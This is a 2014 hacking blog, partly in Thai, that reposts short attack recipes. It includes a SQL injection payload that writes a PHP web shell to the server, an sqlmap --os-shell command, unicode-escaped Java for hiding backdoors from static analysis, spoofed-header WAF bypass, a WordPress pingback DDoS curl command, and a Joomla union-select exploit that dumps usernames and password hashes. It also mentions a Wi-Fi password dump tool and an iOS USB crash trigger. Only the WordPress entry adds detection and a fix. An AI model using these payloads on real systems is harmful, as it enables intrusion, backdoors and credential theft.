Mar 20, 2014

Howto: Fix Hash Sum mismatch

Today, I got this error

W: Failed to fetch gzip:/var/lib/apt/lists/partial/mirrors.neusoft.edu.cn_kali-security_dists_kali_updates_main_binary-amd64_Packages  Hash Sum mismatch
 

These commands will fix this problem

apt-get clean
rm -rf /var/lib/apt/lists/*
rm -rf /var/lib/apt/lists/partial/*
apt-get clean
apt-get update
apt-get upgrade

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Bypassing web application firewalls using HTTP headers

I control all HTTP requests sent out of my browser I can easily add this header fooling the WAF to think I was itself, allowing me to bypass its protections completely:

wafreq.png 

After further research there are several headers that can be defined for WAF’s to whitelist (instead of doing a proper lookup):

  • X-forwarded-for
  • X-remote-IP
  • X-originating-IP
  • x-remote-addr

There is also a hit-list of *types* of addresses/configurations that *might* be whitelisted/vulnerable. (some fictitious examples below):

headers.png 


Source:  http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Hiding backdoor code in Java with unicode encoding

Besides hiding back doors in code, avoiding static analysis and printing text based pictures does anyone have any ideas on what else this could be used for.

System.out.println("\u0053\u0074\u0061\u0072\u0074\u0020\u0054\u0065\u0073\u0074\u0022\u0029\u003b\u0074\u0072\u0079\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u006f\u0070\u0065\u006e\u0020\u002d\u0061\u0020\u0043\u0061\u006c\u0063\u0075\u006c\u0061\u0074\u006f\u0072\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0063\u0061\u006c\u0063\u0022\u0029\u003b\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u0045\u006e\u0064\u0020\u0054\u0065\u0073\u0074");


Source: https://plus.google.com/111673599544007386234/posts/ZeXvRCRZ3LF


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 18, 2014

Wordpress ถูกใช้เป็นเครื่อง DDoS Attack จาก Pingback(XMLRPC) Feature



จากกรณีที่เว็บไซด์ wordpress จำนวนถึง 160000 เว็บไซด์ ถูกนำไปใช้เป็นเครื่องมือ DDoS ได้ เนื่องจาก pingback,trackbacks, remote access จากมือถือ ล้วนแต่เป็น feature ซึ่งทำงานด้วย xmlrpc ทั้งสิ้น
โดยเมื่อดูจากเว็บไซด์ที่ถูกโจมตีจะพบ request ดังนี้
74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"
ซึ่งจะเห็นว่าค่า path หลัง GET นั้นเป็น path ที่ถูก random ขึ้น โดย path ดังกล่าวไม่ตรงกับ cache ของ web server  จึงทำให้ web server จำเป็นต้องโหลด page ใหม่และรีโหลดใหม่ทุก request ส่งผลให้เปลืองทรัพยากรและเวลาการทำงานของเครื่องมาก
โดย request เหล่านั้นมาจาก Wordpress ทั่วไป โดยเป็นผลมาจากการทำงานของ Pingback feature นั่นเอง
Pingbacks เป็นระบบสำหรับการแจ้งกลับไปยังเว็บต้นทางเมื่อมีการนำ link ดังกล่าวไปโพสต์ในเว็บอื่นๆ
1. เมื่อคนเขียนโพสต์ในเว็บไซต์ A ซึ่งเป็นลิงค์ไปเว็บไซต์ B เท่ากับว่าโพสต์ใน A ได้คอมเมนต์โพสต์ใน B
2. เว็บ A จะมีข้อความแจ้งไปยังเว็บไซต์ B ว่ามีคอมเมนต์แบบ pingbacks เกิดขึ้น
3. ผู้ดูแลเว็บไซต์ A จะรับทราบ และหากอนุมัติ จะมีลิงค์กลับไปยังเพจที่คอมเมนต์มาในเว็บไซต์ B ซึ่งโดยทั้วไปตำแหน่งของลิงค์จะอยู่แถวๆคอมเมนต์ในโพสต์ A
ซึ่งโดยปกติ Wordpress จะ enable Pingbacks feature  ไว้โดยปกติ(By Default)

อธิบายการโจมตีที่เกิดขึ้น

โดยปกติ POST Request ของ Pingbacks ที่กลับมาจาก website A ไปยัง website B /xmlrpc.php จะเป็นดังนี้
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
     <param><value><string>http://A</string></value></param>
     <param><value><string>http://B</string></value></param>
  </params>
</methodCall>
 
ซึ่งการโจมตีทาง Hacker อาจจะใช้งาน Request เป็นดังนี้
$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'
- victim.com คือเว็บไซด์ปลายทางที่ตกเป็นเหยื่อที่ทาง www.anywordpressite.com จะส่งข้อมูลกลับไป(GET Request ที่มี /$(random_value))
การโจมตีนี้ไม่ได้ทำให้เกิด traffic amplification เหมือนกับ UDP,DNS Amplification Attack เพราะ GET Request ที่ทาง website B (www.anywordpresssite.com)จะส่งไปขนาดไม่ได้ใหญ่มาก แต่การโจมตีนี้สามารถทำให้สืบไปหาผู้โจมตีต้นทางได้ยากขึ้นเพียงเท่านั้น

วิธีการตรวจสอบว่าเว็บไซด์ของเราถูกใช้ในการโจมตีหรือไม่

เราสามารถตรวจสอบว่า Wordpress ของเราถูกนำไปใช้ในการโจมตีหรือไม่ สามารถทำได้โดยสังเกตุจาก Log ของ POST Request ว่า URL ที่ถูกส่งเข้ามาเป็นแบบ random URL หรือไม่ ถ้าใช่ แสดงว่าอาจเป็นไปได้ว่า /xmlrpc.php ของเราจะได้รับ Request ที่ทำให้เราส่ง Pingsback Request ไปที่เครื่องอื่นเพื่อ DDoS นั่นเอง
ตัวอย่าง Log ของ Request ที่ถูกส่งเข้ามาเพื่อให้เว็บไซด์เราไปโจมตีผู้อื่น
93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://fastbet99.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"

94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

วิธีป้องกัน

เราสามารถป้องกันได้ด้วยการ disable Pingbacks feature หรือสามารถสร้าง filter Request ที่เข้ามาได้โดยการสร้าง plugin แล้วใส่ code เป็น
add_filter( ‘xmlrpc_methods’, function( $methods ) {
   unset( $methods['pingback.ping'] );
   return $methods;
} ); 

Reference




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 17, 2014

Howto: SQL Injection for Shell

1. Find the SQL Injection vulnerability

2. Inject backdoor into php file
’ union select “<? system($_REQUEST['cmd']); ?>”,2,3 INTO OUTFILE ‘/var/www/backdoor.php’

 3. You can use sqlmap for get shell too.
sqlmap -u "URL" --os-shell
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wi-Fi Password Dump v2.0

WiFi Password Dump is the free command-line tool to quickly recover all the Wireless account passwords stored on your system.
It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager.
For each recovered WiFi account, it displays following information:
  • WiFi Name (SSID)
  • Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  • Password Type
  • Password in Hex format
  • Password in clear text
Source: www.sectechno.com/2014/03/16/wi-fi-password-dump-v2-0/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 16, 2014

Tools: Joomla AJAX Shoutbox Remote SQL Injection vulnerability

###################################################################################
Joomla AJAX Shoutbox Remote SQL Injection vulnerability

[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor : 12 March 2014
[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43

[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code: 
113  $jal_lastID = JRequest::getVar( 'jal_lastID',    0     );
114
115  $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';

[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -

Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -

[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st
###################################################################################
 
Source: http://packetstormsecurity.com/files/125721 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: iOS 7 Arbitrary Code Execution



~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Vulnerability Description 
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 When a specific value is supplied in USB Endpoint descriptor for a HID device 
 the Apple device kernel panics and reboots

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 The bug can be triggered using umap (https://github.com/nccgroup/umap)
 as follows:

 sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

 bMaxPacketSize = 0xff

 Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
 CrashReporter Key:   7ed804add6a0507b6a8ca9625f0bcd14abc6801b
 Hardware Model:      iPhone3,1
 Date/Time:           2013-09-26 12:35:46.892 +0100
 OS Version:          iOS 7.0 (11A465)


umap - the USB host security assessment tool 
Based on Facedancer by Travis Goodspeed: http://goodfet.sourceforge.net/hardware/facedancer21/
Released as open source by NCC Group Plc - http://www.nccgroup.com/
Developed by Andy Davis, andy dot davis at nccgroup dot com
https://www.github.com/nccgroup/umap

Source: 
- http://packetstormsecurity.com/files/125727/ios7-exec.txt 
- https://github.com/nccgroup/umap


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |